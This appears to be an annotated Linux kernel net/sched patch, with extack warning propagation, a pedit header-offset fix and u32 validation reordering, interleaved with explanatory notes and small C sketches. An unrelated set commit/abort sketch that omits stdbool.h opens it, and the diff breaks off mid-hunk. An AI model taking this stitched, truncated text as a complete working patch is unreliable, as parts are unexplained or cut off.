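    #include <stdlib.h>
    #include <string.h>

    struct match { int data; };

    static struct match *clone_of(const struct match *m)
    {
            struct match *c = malloc(sizeof(*c));
            if (c)
                    memcpy(c, m, sizeof(*c));
            return c;
    }

    struct set_priv {
            struct match *live;   /* what lookups currently see     */
            struct match *clone;  /* working copy taking insertions */
            bool dirty;
    };

    static void commit_set(struct set_priv *p)
    {
            if (!p->dirty)
                    return;
            p->live = p->clone;   /* kernel: rcu_assign_pointer(); old copy
                                   * freed after a grace period, leaked here */
            p->clone = clone_of(p->live);
            p->dirty = false;
    }

    static void abort_set(struct set_priv *p)
    {
            if (!p->dirty)
                    return;
            free(p->clone);       /* throw away the uncommitted edits */
            p->clone = clone_of(p->live);
            p->dirty = false;
    }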
+diff --git a/net/sched/act_api.c b/net/sched/act_api.c
+index 9b31a10cc6399..b33f88e50aa90 100644
+--- a/net/sched/act_api.c
++++ b/net/sched/act_api.c
+@@ -1581,7 +1581,7 @@ errout:
+ 
+ static int tca_get_fill(struct sk_buff *skb, struct tc_action *actions[],
+ 			u32 portid, u32 seq, u16 flags, int event, int bind,
+-			int ref)
++			int ref, struct netlink_ext_ack *extack)
+ {
+ 	struct tcamsg *t;
+ 	struct nlmsghdr *nlh;
+@@ -1596,6 +1596,10 @@ static int tca_get_fill(struct sk_buff *skb, struct tc_action *actions[],
+ 	t->tca__pad1 = 0;
+ 	t->tca__pad2 = 0;
+ 
++	if (extack && extack->_msg &&
++	    nla_put_string(skb, TCA_ROOT_EXT_WARN_MSG, extack->_msg))
++		goto out_nlmsg_trim;
++
+ 	nest = nla_nest_start_noflag(skb, TCA_ACT_TAB);
+ 	if (!nest)
+ 		goto out_nlmsg_trim;
+@@ -1606,6 +1610,7 @@ static int tca_get_fill(struct sk_buff *skb, struct tc_action *actions[],
+ 	nla_nest_end(skb, nest);
+ 
+ 	nlh->nlmsg_len = skb_tail_pointer(skb) - b;
++
+ 	return skb->len;
+ 
+ out_nlmsg_trim:
+@@ -1624,7 +1629,7 @@ tcf_get_notify(struct net *net, u32 portid, struct nlmsghdr *n,
+ 	if (!skb)
+ 		return -ENOBUFS;
+ 	if (tca_get_fill(skb, actions, portid, n->nlmsg_seq, 0, event,
+-			 0, 1) <= 0) {
++			 0, 1, NULL) <= 0) {
+ 		NL_SET_ERR_MSG(extack, "Failed to fill netlink attributes while adding TC action");
+ 		kfree_skb(skb);
+ 		return -EINVAL;
+@@ -1798,7 +1803,7 @@ tcf_reoffload_del_notify(struct net *net, struct tc_action *action)
+ 	if (!skb)
+ 		return -ENOBUFS;
+ 
+-	if (tca_get_fill(skb, actions, 0, 0, 0, RTM_DELACTION, 0, 1) <= 0) {
++	if (tca_get_fill(skb, actions, 0, 0, 0, RTM_DELACTION, 0, 1, NULL) <= 0) {
+ 		kfree_skb(skb);
+ 		return -EINVAL;
+ 	}
+@@ -1885,7 +1890,7 @@ tcf_del_notify(struct net *net, struct nlmsghdr *n, struct tc_action *actions[],
+ 		return -ENOBUFS;
+ 
+ 	if (tca_get_fill(skb, actions, portid, n->nlmsg_seq, 0, RTM_DELACTION,
+-			 0, 2) <= 0) {
++			 0, 2, extack) <= 0) {
+ 		NL_SET_ERR_MSG(extack, "Failed to fill netlink TC action attributes");
+ 		kfree_skb(skb);
+ 		return -EINVAL;
+@@ -1964,7 +1969,7 @@ tcf_add_notify(struct net *net, struct nlmsghdr *n, struct tc_action *actions[],
+ 		return -ENOBUFS;
+ 
+ 	if (tca_get_fill(skb, actions, portid, n->nlmsg_seq, n->nlmsg_flags,
+-			 RTM_NEWACTION, 0, 0) <= 0) {
++			 RTM_NEWACTION, 0, 0, extack) <= 0) {
+ 		NL_SET_ERR_MSG(extack, "Failed to fill netlink attributes while adding TC action");
+ 		kfree_skb(skb);
+ 		return -EINVAL;
+diff --git a/net/sched/act_pedit.c b/net/sched/act_pedit.c
+index 238759c3192e8..180669aa9d097 100644
+--- a/net/sched/act_pedit.c
++++ b/net/sched/act_pedit.c
+@@ -13,7 +13,10 @@
+ #include <linux/rtnetlink.h>
+ #include <linux/module.h>
+ #include <linux/init.h>
++#include <linux/ip.h>
++#include <linux/ipv6.h>
+ #include <linux/slab.h>
++#include <net/ipv6.h>
+ #include <net/netlink.h>
+ #include <net/pkt_sched.h>
+ #include <linux/tc_act/tc_pedit.h>
+@@ -312,11 +315,35 @@ static bool offset_valid(struct sk_buff *skb, int offset)
+ 	return true;
+ }
+ 
+-static int pedit_skb_hdr_offset(struct sk_buff *skb,
+-				enum pedit_header_type htype, int *hoffset)
++static int pedit_l4_skb_offset(struct sk_buff *skb, int *hoffset, const int header_type)
+ {
++	const int noff = skb_network_offset(skb);
+ 	int ret = -EINVAL;
++	struct iphdr _iph;
++
++	switch (skb->protocol) {
++	case htons(ETH_P_IP): {
++		const struct iphdr *iph = skb_header_pointer(skb, noff, sizeof(_iph), &_iph);
+ 
++		if (!iph)
++			goto out;
++		*hoffset = noff + iph->ihl * 4;
++		ret = 0;
++		break;
++	}
++	case htons(ETH_P_IPV6):
++		ret = ipv6_find_hdr(skb, hoffset, header_type, NULL, NULL) == header_type ? 0 : -EINVAL;
++		break;
++	}
++out:
++	return ret;
++}
++
++static int pedit_skb_hdr_offset(struct sk_buff *skb,
++				 enum pedit_header_type htype, int *hoffset)
++{
++	int ret = -EINVAL;
++	/* 'htype' is validated in the netlink parsing */
+ 	switch (htype) {
+ 	case TCA_PEDIT_KEY_EX_HDR_TYPE_ETH:
+ 		if (skb_mac_header_was_set(skb)) {
+@@ -331,25 +358,26 @@ static int pedit_skb_hdr_offset(struct sk_buff *skb,
+ 		ret = 0;
+ 		break;
+ 	case TCA_PEDIT_KEY_EX_HDR_TYPE_TCP:
++		ret = pedit_l4_skb_offset(skb, hoffset, IPPROTO_TCP);
++		break;
+ 	case TCA_PEDIT_KEY_EX_HDR_TYPE_UDP:
+-		if (skb_transport_header_was_set(skb)) {
+-			*hoffset = skb_transport_offset(skb);
+-			ret = 0;
+-		}
++		ret = pedit_l4_skb_offset(skb, hoffset, IPPROTO_UDP);
+ 		break;
+ 	default:
+-		ret = -EINVAL;
+ 		break;
+ 	}
+-
+ 	return ret;
+ }
+ 
+ static int tcf_pedit_act(struct sk_buff *skb, const struct tc_action *a,
+ 			 struct tcf_result *res)
+ {
++	enum pedit_header_type htype = TCA_PEDIT_KEY_EX_HDR_TYPE_NETWORK;
++	enum pedit_cmd cmd = TCA_PEDIT_KEY_EX_CMD_SET;
+ 	struct tcf_pedit *p = to_pedit(a);
++	struct tcf_pedit_key_ex *tkey_ex;
+ 	struct tcf_pedit_parms *parms;
++	struct tc_pedit_key *tkey;
+ 	u32 max_offset;
+ 	int i;
+ 
+@@ -365,88 +393,80 @@ static int tcf_pedit_act(struct sk_buff *skb, const struct tc_action *a,
+ 	tcf_lastuse_update(&p->tcf_tm);
+ 	tcf_action_update_bstats(&p->common, skb);
+ 
+-	if (parms->tcfp_nkeys > 0) {
+-		struct tc_pedit_key *tkey = parms->tcfp_keys;
+-		struct tcf_pedit_key_ex *tkey_ex = parms->tcfp_keys_ex;
+-		enum pedit_header_type htype =
+-			TCA_PEDIT_KEY_EX_HDR_TYPE_NETWORK;
+-		enum pedit_cmd cmd = TCA_PEDIT_KEY_EX_CMD_SET;
+-
+-		for (i = parms->tcfp_nkeys; i > 0; i--, tkey++) {
+-			u32 *ptr, hdata;
+-			int offset = tkey->off;
+-			int hoffset;
+-			u32 val;
+-			int rc;
+-
+-			if (tkey_ex) {
+-				htype = tkey_ex->htype;
+-				cmd = tkey_ex->cmd;
+-
+-				tkey_ex++;
+-			}
++	tkey = parms->tcfp_keys;
++	tkey_ex = parms->tcfp_keys_ex;
+ 
+-			rc = pedit_skb_hdr_offset(skb, htype, &hoffset);
+-			if (rc) {
+-				pr_info("tc action pedit bad header type specified (0x%x)\n",
+-					htype);
+-				goto bad;
+-			}
++	for (i = parms->tcfp_nkeys; i > 0; i--, tkey++) {
++		int offset = tkey->off;
++		int hoffset = 0;
++		u32 *ptr, hdata;
++		u32 val;
++		int rc;
+ 
+-			if (tkey->offmask) {
+-				u8 *d, _d;
+-
+-				if (!offset_valid(skb, hoffset + tkey->at)) {
+-					pr_info("tc action pedit 'at' offset %d out of bounds\n",
+-						hoffset + tkey->at);
+-					goto bad;
+-				}
+-				d = skb_header_pointer(skb, hoffset + tkey->at,
+-						       sizeof(_d), &_d);
+-				if (!d)
+-					goto bad;
+-				offset += (*d & tkey->offmask) >> tkey->shift;
+-			}
++		if (tkey_ex) {
++			htype = tkey_ex->htype;
++			cmd = tkey_ex->cmd;
+ 
+-			if (offset % 4) {
+-				pr_info("tc action pedit offset must be on 32 bit boundaries\n");
+-				goto bad;
+-			}
++			tkey_ex++;
++		}
+ 
+-			if (!offset_valid(skb, hoffset + offset)) {
+-				pr_info("tc action pedit offset %d out of bounds\n",
+-					hoffset + offset);
+-				goto bad;
+-			}
++		rc = pedit_skb_hdr_offset(skb, htype, &hoffset);
++		if (rc) {
++			pr_info_ratelimited("tc action pedit unable to extract header offset for header type (0x%x)\n", htype);
++			goto bad;
++		}
+ 
+-			ptr = skb_header_pointer(skb, hoffset + offset,
+-						 sizeof(hdata), &hdata);
+-			if (!ptr)
+-				goto bad;
+-			/* just do it, baby */
+-			switch (cmd) {
+-			case TCA_PEDIT_KEY_EX_CMD_SET:
+-				val = tkey->val;
+-				break;
+-			case TCA_PEDIT_KEY_EX_CMD_ADD:
+-				val = (*ptr + tkey->val) & ~tkey->mask;
+-				break;
+-			default:
+-				pr_info("tc action pedit bad command (%d)\n",
+-					cmd);
++		if (tkey->offmask) {
++			u8 *d, _d;
++
++			if (!offset_valid(skb, hoffset + tkey->at)) {
++				pr_info("tc action pedit 'at' offset %d out of bounds\n",
++					hoffset + tkey->at);
+ 				goto bad;
+ 			}
++			d = skb_header_pointer(skb, hoffset + tkey->at,
++					       sizeof(_d), &_d);
++			if (!d)
++				goto bad;
++			offset += (*d & tkey->offmask) >> tkey->shift;
++		}
+ 
+-			*ptr = ((*ptr & tkey->mask) ^ val);
+-			if (ptr == &hdata)
+-				skb_store_bits(skb, hoffset + offset, ptr, 4);
++		if (offset % 4) {
++			pr_info("tc action pedit offset must be on 32 bit boundaries\n");
++			goto bad;
+ 		}
+ 
+-		goto done;
+-	} else {
+-		WARN(1, "pedit BUG: index %d\n", p->tcf_index);
++		if (!offset_valid(skb, hoffset + offset)) {
++			pr_info("tc action pedit offset %d out of bounds\n",
++				hoffset + offset);
++			goto bad;
++		}
++
++		ptr = skb_header_pointer(skb, hoffset + offset,
++					 sizeof(hdata), &hdata);
++		if (!ptr)
++			goto bad;
++		/* just do it, baby */
++		switch (cmd) {
++		case TCA_PEDIT_KEY_EX_CMD_SET:
++			val = tkey->val;
++			break;
++		case TCA_PEDIT_KEY_EX_CMD_ADD:
++			val = (*ptr + tkey->val) & ~tkey->mask;
++			break;
++		default:
++			pr_info("tc action pedit bad command (%d)\n",
++				cmd);
++			goto bad;
++		}
++
++		*ptr = ((*ptr & tkey->mask) ^ val);
++		if (ptr == &hdata)
++			skb_store_bits(skb, hoffset + offset, ptr, 4);
+ 	}
+ 
++	goto done;
++
+ bad:
+ 	spin_lock(&p->tcf_lock);
+ 	p->tcf_qstats.overlimits++;
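[The pedit fix derives the L4 offset from the IP header itself instead of trusting skb_transport_offset(), which the old code required to have been set. For IPv4 that is just the network offset plus the IHL in words, sketched below; the IPv6 side of the fix walks extension headers instead:]

    #include <stdint.h>

    struct iphdr_min {
            uint8_t vihl; /* version in the high nibble, IHL in the low one */
            /* ... remainder of the IPv4 header ... */
    };

    /* IHL counts 32-bit words, so the L4 header starts at noff + ihl * 4 */
    static int l4_offset(int network_off, const struct iphdr_min *iph)
    {
            return network_off + (iph->vihl & 0x0f) * 4;
    }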
+diff --git a/net/sched/cls_api.c b/net/sched/cls_api.c
+index abaf75300497d..445ab1b0537da 100644
+--- a/net/sched/cls_api.c
++++ b/net/sched/cls_api.c
+@@ -485,7 +485,8 @@ static struct tcf_chain *tcf_chain_lookup_rcu(const struct tcf_block *block,
+ #endif
+ 
+ static int tc_chain_notify(struct tcf_chain *chain, struct sk_buff *oskb,
+-			   u32 seq, u16 flags, int event, bool unicast);
++			   u32 seq, u16 flags, int event, bool unicast,
++			   struct netlink_ext_ack *extack);
+ 
+ static struct tcf_chain *__tcf_chain_get(struct tcf_block *block,
+ 					 u32 chain_index, bool create,
+@@ -518,7 +519,7 @@ static struct tcf_chain *__tcf_chain_get(struct tcf_block *block,
+ 	 */
+ 	if (is_first_reference && !by_act)
+ 		tc_chain_notify(chain, NULL, 0, NLM_F_CREATE | NLM_F_EXCL,
+-				RTM_NEWCHAIN, false);
++				RTM_NEWCHAIN, false, NULL);
+ 
+ 	return chain;
+ 
+@@ -551,8 +552,8 @@ static void __tcf_chain_put(struct tcf_chain *chain, bool by_act,
+ {
+ 	struct tcf_block *block = chain->block;
+ 	const struct tcf_proto_ops *tmplt_ops;
++	unsigned int refcnt, non_act_refcnt;
+ 	bool free_block = false;
+-	unsigned int refcnt;
+ 	void *tmplt_priv;
+ 
+ 	mutex_lock(&block->lock);
+@@ -572,13 +573,15 @@ static void __tcf_chain_put(struct tcf_chain *chain, bool by_act,
+ 	 * save these to temporary variables.
+ 	 */
+ 	refcnt = --chain->refcnt;
++	non_act_refcnt = refcnt - chain->action_refcnt;
+ 	tmplt_ops = chain->tmplt_ops;
+ 	tmplt_priv = chain->tmplt_priv;
+ 
+-	/* The last dropped non-action reference will trigger notification. */
+-	if (refcnt - chain->action_refcnt == 0 && !by_act) {
+-		tc_chain_notify_delete(tmplt_ops, tmplt_priv, chain->index,
+-				       block, NULL, 0, 0, false);
++	if (non_act_refcnt == chain->explicitly_created && !by_act) {
++		if (non_act_refcnt == 0)
++			tc_chain_notify_delete(tmplt_ops, tmplt_priv,
++					       chain->index, block, NULL, 0, 0,
++					       false);
+ 		/* Last reference to chain, no need to lock. */
+ 		chain->flushing = false;
+ 	}
+@@ -1815,7 +1818,8 @@ static int tcf_fill_node(struct net *net, struct sk_buff *skb,
+ 			 struct tcf_proto *tp, struct tcf_block *block,
+ 			 struct Qdisc *q, u32 parent, void *fh,
+ 			 u32 portid, u32 seq, u16 flags, int event,
+-			 bool terse_dump, bool rtnl_held)
++			 bool terse_dump, bool rtnl_held,
++			 struct netlink_ext_ack *extack)
+ {
+ 	struct tcmsg *tcm;
+ 	struct nlmsghdr  *nlh;
+@@ -1855,7 +1859,13 @@ static int tcf_fill_node(struct net *net, struct sk_buff *skb,
+ 		    tp->ops->dump(net, tp, fh, skb, tcm, rtnl_held) < 0)
+ 			goto nla_put_failure;
+ 	}
++
++	if (extack && extack->_msg &&
++	    nla_put_string(skb, TCA_EXT_WARN_MSG, extack->_msg))
++		goto nla_put_failure;
++
+ 	nlh->nlmsg_len = skb_tail_pointer(skb) - b;
++
+ 	return skb->len;
+ 
+ out_nlmsg_trim:
+@@ -1869,7 +1879,7 @@ static int tfilter_notify(struct net *net, struct sk_buff *oskb,
+ 			  struct nlmsghdr *n, struct tcf_proto *tp,
+ 			  struct tcf_block *block, struct Qdisc *q,
+ 			  u32 parent, void *fh, int event, bool unicast,
+-			  bool rtnl_held)
++			  bool rtnl_held, struct netlink_ext_ack *extack)
+ {
+ 	struct sk_buff *skb;
+ 	u32 portid = oskb ? NETLINK_CB(oskb).portid : 0;
+@@ -1881,7 +1891,7 @@ static int tfilter_notify(struct net *net, struct sk_buff *oskb,
+ 
+ 	if (tcf_fill_node(net, skb, tp, block, q, parent, fh, portid,
+ 			  n->nlmsg_seq, n->nlmsg_flags, event,
+-			  false, rtnl_held) <= 0) {
++			  false, rtnl_held, extack) <= 0) {
+ 		kfree_skb(skb);
+ 		return -EINVAL;
+ 	}
+@@ -1910,7 +1920,7 @@ static int tfilter_del_notify(struct net *net, struct sk_buff *oskb,
+ 
+ 	if (tcf_fill_node(net, skb, tp, block, q, parent, fh, portid,
+ 			  n->nlmsg_seq, n->nlmsg_flags, RTM_DELTFILTER,
+-			  false, rtnl_held) <= 0) {
++			  false, rtnl_held, extack) <= 0) {
+ 		NL_SET_ERR_MSG(extack, "Failed to build del event notification");
+ 		kfree_skb(skb);
+ 		return -EINVAL;
+@@ -1936,14 +1946,15 @@ static int tfilter_del_notify(struct net *net, struct sk_buff *oskb,
+ static void tfilter_notify_chain(struct net *net, struct sk_buff *oskb,
+ 				 struct tcf_block *block, struct Qdisc *q,
+ 				 u32 parent, struct nlmsghdr *n,
+-				 struct tcf_chain *chain, int event)
++				 struct tcf_chain *chain, int event,
++				 struct netlink_ext_ack *extack)
+ {
+ 	struct tcf_proto *tp;
+ 
+ 	for (tp = tcf_get_next_proto(chain, NULL);
+ 	     tp; tp = tcf_get_next_proto(chain, tp))
+-		tfilter_notify(net, oskb, n, tp, block,
+-			       q, parent, NULL, event, false, true);
++		tfilter_notify(net, oskb, n, tp, block, q, parent, NULL,
++			       event, false, true, extack);
+ }
+ 
+ static void tfilter_put(struct tcf_proto *tp, void *fh)
+@@ -2147,7 +2158,7 @@ replay:
+ 			      flags, extack);
+ 	if (err == 0) {
+ 		tfilter_notify(net, skb, n, tp, block, q, parent, fh,
+-			       RTM_NEWTFILTER, false, rtnl_held);
++			       RTM_NEWTFILTER, false, rtnl_held, extack);
+ 		tfilter_put(tp, fh);
+ 		/* q pointer is NULL for shared blocks */
+ 		if (q)
+@@ -2275,7 +2286,7 @@ static int tc_del_tfilter(struct sk_buff *skb, struct nlmsghdr *n,
+ 
+ 	if (prio == 0) {
+ 		tfilter_notify_chain(net, skb, block, q, parent, n,
+-				     chain, RTM_DELTFILTER);
++				     chain, RTM_DELTFILTER, extack);
+ 		tcf_chain_flush(chain, rtnl_held);
+ 		err = 0;
+ 		goto errout;
+@@ -2299,7 +2310,7 @@ static int tc_del_tfilter(struct sk_buff *skb, struct nlmsghdr *n,
+ 
+ 		tcf_proto_put(tp, rtnl_held, NULL);
+ 		tfilter_notify(net, skb, n, tp, block, q, parent, fh,
+-			       RTM_DELTFILTER, false, rtnl_held);
++			       RTM_DELTFILTER, false, rtnl_held, extack);
+ 		err = 0;
+ 		goto errout;
+ 	}
+@@ -2443,7 +2454,7 @@ static int tc_get_tfilter(struct sk_buff *skb, struct nlmsghdr *n,
+ 		err = -ENOENT;
+ 	} else {
+ 		err = tfilter_notify(net, skb, n, tp, block, q, parent,
+-				     fh, RTM_NEWTFILTER, true, rtnl_held);
++				     fh, RTM_NEWTFILTER, true, rtnl_held, NULL);
+ 		if (err < 0)
+ 			NL_SET_ERR_MSG(extack, "Failed to send filter notify message");
+ 	}
+@@ -2481,7 +2492,7 @@ static int tcf_node_dump(struct tcf_proto *tp, void *n, struct tcf_walker *arg)
+ 	return tcf_fill_node(net, a->skb, tp, a->block, a->q, a->parent,
+ 			     n, NETLINK_CB(a->cb->skb).portid,
+ 			     a->cb->nlh->nlmsg_seq, NLM_F_MULTI,
+-			     RTM_NEWTFILTER, a->terse_dump, true);
++			     RTM_NEWTFILTER, a->terse_dump, true, NULL);
+ }
+ 
+ static bool tcf_chain_dump(struct tcf_chain *chain, struct Qdisc *q, u32 parent,
+@@ -2515,7 +2526,7 @@ static bool tcf_chain_dump(struct tcf_chain *chain, struct Qdisc *q, u32 parent,
+ 			if (tcf_fill_node(net, skb, tp, block, q, parent, NULL,
+ 					  NETLINK_CB(cb->skb).portid,
+ 					  cb->nlh->nlmsg_seq, NLM_F_MULTI,
+-					  RTM_NEWTFILTER, false, true) <= 0)
++					  RTM_NEWTFILTER, false, true, NULL) <= 0)
+ 				goto errout;
+ 			cb->args[1] = 1;
+ 		}
+@@ -2658,7 +2669,8 @@ static int tc_chain_fill_node(const struct tcf_proto_ops *tmplt_ops,
+ 			      void *tmplt_priv, u32 chain_index,
+ 			      struct net *net, struct sk_buff *skb,
+ 			      struct tcf_block *block,
+-			      u32 portid, u32 seq, u16 flags, int event)
++			      u32 portid, u32 seq, u16 flags, int event,
++			      struct netlink_ext_ack *extack)
+ {
+ 	unsigned char *b = skb_tail_pointer(skb);
+ 	const struct tcf_proto_ops *ops;
+@@ -2695,7 +2707,12 @@ static int tc_chain_fill_node(const struct tcf_proto_ops *tmplt_ops,
+ 			goto nla_put_failure;
+ 	}
+ 
++	if (extack && extack->_msg &&
++	    nla_put_string(skb, TCA_EXT_WARN_MSG, extack->_msg))
++		goto out_nlmsg_trim;
++
+ 	nlh->nlmsg_len = skb_tail_pointer(skb) - b;
++
+ 	return skb->len;
+ 
+ out_nlmsg_trim:
+@@ -2705,7 +2722,8 @@ nla_put_failure:
+ }
+ 
+ static int tc_chain_notify(struct tcf_chain *chain, struct sk_buff *oskb,
+-			   u32 seq, u16 flags, int event, bool unicast)
++			   u32 seq, u16 flags, int event, bool unicast,
++			   struct netlink_ext_ack *extack)
+ {
+ 	u32 portid = oskb ? NETLINK_CB(oskb).portid : 0;
+ 	struct tcf_block *block = chain->block;
+@@ -2719,7 +2737,7 @@ static int tc_chain_notify(struct tcf_chain *chain, struct sk_buff *oskb,
+ 
+ 	if (tc_chain_fill_node(chain->tmplt_ops, chain->tmplt_priv,
+ 			       chain->index, net, skb, block, portid,
+-			       seq, flags, event) <= 0) {
++			       seq, flags, event, extack) <= 0) {
+ 		kfree_skb(skb);
+ 		return -EINVAL;
+ 	}
+@@ -2747,7 +2765,7 @@ static int tc_chain_notify_delete(const struct tcf_proto_ops *tmplt_ops,
+ 		return -ENOBUFS;
+ 
+ 	if (tc_chain_fill_node(tmplt_ops, tmplt_priv, chain_index, net, skb,
+-			       block, portid, seq, flags, RTM_DELCHAIN) <= 0) {
++			       block, portid, seq, flags, RTM_DELCHAIN, NULL) <= 0) {
+ 		kfree_skb(skb);
+ 		return -EINVAL;
+ 	}
+@@ -2900,11 +2918,11 @@ replay:
+ 		}
+ 
+ 		tc_chain_notify(chain, NULL, 0, NLM_F_CREATE | NLM_F_EXCL,
+-				RTM_NEWCHAIN, false);
++				RTM_NEWCHAIN, false, extack);
+ 		break;
+ 	case RTM_DELCHAIN:
+ 		tfilter_notify_chain(net, skb, block, q, parent, n,
+-				     chain, RTM_DELTFILTER);
++				     chain, RTM_DELTFILTER, extack);
+ 		/* Flush the chain first as the user requested chain removal. */
+ 		tcf_chain_flush(chain, true);
+ 		/* In case the chain was successfully deleted, put a reference
+@@ -2914,7 +2932,7 @@ replay:
+ 		break;
+ 	case RTM_GETCHAIN:
+ 		err = tc_chain_notify(chain, skb, n->nlmsg_seq,
+-				      n->nlmsg_flags, n->nlmsg_type, true);
++				      n->nlmsg_flags, n->nlmsg_type, true, extack);
+ 		if (err < 0)
+ 			NL_SET_ERR_MSG(extack, "Failed to send chain notify message");
+ 		break;
+@@ -3014,7 +3032,7 @@ static int tc_dump_chain(struct sk_buff *skb, struct netlink_callback *cb)
+ 					 chain->index, net, skb, block,
+ 					 NETLINK_CB(cb->skb).portid,
+ 					 cb->nlh->nlmsg_seq, NLM_F_MULTI,
+-					 RTM_NEWCHAIN);
++					 RTM_NEWCHAIN, NULL);
+ 		if (err <= 0)
+ 			break;
+ 		index++;
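
The cls_api.c hunks above all follow one pattern: thread the extack pointer down into the fill functions and, when a warning message is present, append it as a TCA_EXT_WARN_MSG attribute, backing the buffer out on failure. A minimal userspace sketch of that optional-trailing-attribute shape (msgbuf/append are invented stand-ins, not kernel API, and this simplified variant merely drops the attribute where the kernel cancels the whole message):

    /* Take a tail mark, try the optional append, roll back on failure. */
    #include <stdio.h>
    #include <string.h>

    struct msgbuf { char data[64]; size_t len; };

    static int append(struct msgbuf *b, const char *s)
    {
        size_t n = strlen(s);

        if (b->len + n > sizeof(b->data))
            return -1;              /* no room */
        memcpy(b->data + b->len, s, n);
        b->len += n;
        return 0;
    }

    int main(void)
    {
        struct msgbuf b = { .len = 0 };
        const char *warn = "offload warning";  /* extack->_msg stand-in */
        size_t mark;

        append(&b, "FILTER ");
        mark = b.len;                   /* like skb_tail_pointer() */
        if (warn && append(&b, warn) < 0)
            b.len = mark;               /* drop just the attribute */
        printf("%.*s\n", (int)b.len, b.data);
        return 0;
    }
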
+diff --git a/net/sched/cls_u32.c b/net/sched/cls_u32.c
+index 34d25f7a0687a..a3477537c102b 100644
+--- a/net/sched/cls_u32.c
++++ b/net/sched/cls_u32.c
+@@ -716,13 +716,19 @@ static int u32_set_parms(struct net *net, struct tcf_proto *tp,
+ 			 struct nlattr *est, u32 flags, u32 fl_flags,
+ 			 struct netlink_ext_ack *extack)
+ {
+-	int err;
++	int err, ifindex = -1;
+ 
+ 	err = tcf_exts_validate_ex(net, tp, tb, est, &n->exts, flags,
+ 				   fl_flags, extack);
+ 	if (err < 0)
+ 		return err;
+ 
++	if (tb[TCA_U32_INDEV]) {
++		ifindex = tcf_change_indev(net, tb[TCA_U32_INDEV], extack);
++		if (ifindex < 0)
++			return -EINVAL;
++	}
++
+ 	if (tb[TCA_U32_LINK]) {
+ 		u32 handle = nla_get_u32(tb[TCA_U32_LINK]);
+ 		struct tc_u_hnode *ht_down = NULL, *ht_old;
+@@ -757,13 +763,9 @@ static int u32_set_parms(struct net *net, struct tcf_proto *tp,
+ 		tcf_bind_filter(tp, &n->res, base);
+ 	}
+ 
+-	if (tb[TCA_U32_INDEV]) {
+-		int ret;
+-		ret = tcf_change_indev(net, tb[TCA_U32_INDEV], extack);
+-		if (ret < 0)
+-			return -EINVAL;
+-		n->ifindex = ret;
+-	}
++	if (ifindex >= 0)
++		n->ifindex = ifindex;
++
+ 	return 0;
+ }
+ 
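
The u32_set_parms() reordering above is a validate-then-commit fix: TCA_U32_INDEV is now resolved before any node state is touched, so a bad ifindex can no longer leave the filter half-updated after the link and classid handling have already run. A small sketch of the same shape, under invented names:

    /* All inputs are validated into locals; the object is written last. */
    #include <stdio.h>

    struct filter { int ifindex; int classid; };

    static int parse(struct filter *f, int raw_ifindex, int raw_classid)
    {
        int ifindex = -1;

        if (raw_ifindex != 0) {
            if (raw_ifindex < 0)
                return -1;      /* reject before mutating *f */
            ifindex = raw_ifindex;
        }
        if (raw_classid < 0)
            return -1;          /* *f still untouched here */

        /* commit phase: everything validated */
        if (ifindex >= 0)
            f->ifindex = ifindex;
        f->classid = raw_classid;
        return 0;
    }

    int main(void)
    {
        struct filter f = { .ifindex = 7, .classid = 1 };

        if (parse(&f, -5, 2) < 0)
            printf("rejected, ifindex still %d\n", f.ifindex);
        return 0;
    }
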
+diff --git a/net/sched/sch_api.c b/net/sched/sch_api.c
+index 6fb345ec22641..01d07e6a68119 100644
+--- a/net/sched/sch_api.c
++++ b/net/sched/sch_api.c
+@@ -907,7 +907,8 @@ static void qdisc_offload_graft_root(struct net_device *dev,
+ }
+ 
+ static int tc_fill_qdisc(struct sk_buff *skb, struct Qdisc *q, u32 clid,
+-			 u32 portid, u32 seq, u16 flags, int event)
++			 u32 portid, u32 seq, u16 flags, int event,
++			 struct netlink_ext_ack *extack)
+ {
+ 	struct gnet_stats_basic_sync __percpu *cpu_bstats = NULL;
+ 	struct gnet_stats_queue __percpu *cpu_qstats = NULL;
+@@ -975,7 +976,12 @@ static int tc_fill_qdisc(struct sk_buff *skb, struct Qdisc *q, u32 clid,
+ 	if (gnet_stats_finish_copy(&d) < 0)
+ 		goto nla_put_failure;
+ 
++	if (extack && extack->_msg &&
++	    nla_put_string(skb, TCA_EXT_WARN_MSG, extack->_msg))
++		goto out_nlmsg_trim;
++
+ 	nlh->nlmsg_len = skb_tail_pointer(skb) - b;
++
+ 	return skb->len;
+ 
+ out_nlmsg_trim:
+@@ -996,7 +1002,8 @@ static bool tc_qdisc_dump_ignore(struct Qdisc *q, bool dump_invisible)
+ 
+ static int qdisc_notify(struct net *net, struct sk_buff *oskb,
+ 			struct nlmsghdr *n, u32 clid,
+-			struct Qdisc *old, struct Qdisc *new)
++			struct Qdisc *old, struct Qdisc *new,
++			struct netlink_ext_ack *extack)
+ {
+ 	struct sk_buff *skb;
+ 	u32 portid = oskb ? NETLINK_CB(oskb).portid : 0;
+@@ -1007,12 +1014,12 @@ static int qdisc_notify(struct net *net, struct sk_buff *oskb,
+ 
+ 	if (old && !tc_qdisc_dump_ignore(old, false)) {
+ 		if (tc_fill_qdisc(skb, old, clid, portid, n->nlmsg_seq,
+-				  0, RTM_DELQDISC) < 0)
++				  0, RTM_DELQDISC, extack) < 0)
+ 			goto err_out;
+ 	}
+ 	if (new && !tc_qdisc_dump_ignore(new, false)) {
+ 		if (tc_fill_qdisc(skb, new, clid, portid, n->nlmsg_seq,
+-				  old ? NLM_F_REPLACE : 0, RTM_NEWQDISC) < 0)
++				  old ? NLM_F_REPLACE : 0, RTM_NEWQDISC, extack) < 0)
+ 			goto err_out;
+ 	}
+ 
+@@ -1027,10 +1034,11 @@ err_out:
+ 
+ static void notify_and_destroy(struct net *net, struct sk_buff *skb,
+ 			       struct nlmsghdr *n, u32 clid,
+-			       struct Qdisc *old, struct Qdisc *new)
++			       struct Qdisc *old, struct Qdisc *new,
++			       struct netlink_ext_ack *extack)
+ {
+ 	if (new || old)
+-		qdisc_notify(net, skb, n, clid, old, new);
++		qdisc_notify(net, skb, n, clid, old, new, extack);
+ 
+ 	if (old)
+ 		qdisc_put(old);
+@@ -1068,17 +1076,29 @@ static int qdisc_graft(struct net_device *dev, struct Qdisc *parent,
+ 
+ 	if (parent == NULL) {
+ 		unsigned int i, num_q, ingress;
++		struct netdev_queue *dev_queue;
+ 
+ 		ingress = 0;
+ 		num_q = dev->num_tx_queues;
+ 		if ((q && q->flags & TCQ_F_INGRESS) ||
+ 		    (new && new->flags & TCQ_F_INGRESS)) {
+-			num_q = 1;
+ 			ingress = 1;
+-			if (!dev_ingress_queue(dev)) {
++			dev_queue = dev_ingress_queue(dev);
++			if (!dev_queue) {
